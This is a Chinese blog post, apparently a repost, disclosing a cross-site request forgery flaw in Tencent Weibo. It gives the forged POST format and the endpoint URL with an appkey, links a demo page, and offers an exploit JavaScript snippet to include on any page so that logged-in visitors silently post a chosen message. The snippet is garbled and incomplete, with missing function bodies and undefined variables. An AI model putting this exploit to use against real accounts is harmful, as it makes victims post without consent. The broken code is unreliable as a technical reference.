Title:腾讯微博任意访问者发广播漏洞
Author:Tueur
漏洞类型:CSRF漏洞,
简介:
在用户登录过网页微博的前提下,任意用户访问一个含有CSRF代码的网页,访问者就会自动发送一条我们指定的广播到微博。
下面是伪造的post请求的数据包格式
content=广播内容&pic=图片文件
将此数据包post发送到微博应用接口:http://v.t.qq.com/wall/upload.php?a=659654db3a094394bcc253d6e0814871
用户就会发送一条含有图片的广播到微博~
用户防范此类型漏洞办法:将浏览器设置为阻止任何第三方cookie,能防站内执行,但对新打开窗口无效。
上个月发现的漏洞,丢在那一直没时间玩,放出来算了。顺便花时间写了个利用js。
测试Demo:http://www.tueur.net/csrf_domo.html
CSRF代码(仅以文字广播为例):
|
以下是引用片段: //Author:Tueur var content = "腾讯微博CSRF漏洞测试~";//广播内容 var appkey = "659654db3a094394bcc253d6e0814871";//你的appkey(本人appkey仅供测试,appkey申请:open.t.qq.com) function postdata() form._submit_function_ = form.submit; form.setAttribute("method", "post"); form.setAttribute("target","subForm") form.appendChild(hiddenField); postdata(); |
将以上代码保存为xxx.js在任意页面引用。
文章来源于lcx.cc:腾讯微博任意访问者发广播漏洞
相关推荐: 【视频】求生之路2 Rochelle 笑声[鬼畜]版
求生之路2 Rochelle 笑声鬼畜视频版 Rochelle 笑声鬼畜视频版,闲来无事做的。做鬼畜真他娘的耗时间,简直就是一百毫秒一百毫秒拼出来的。。。 声音来源求生之路2游戏真人配音,Rochelle 女角色真人配音……,然后又用了“卡农慢…
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论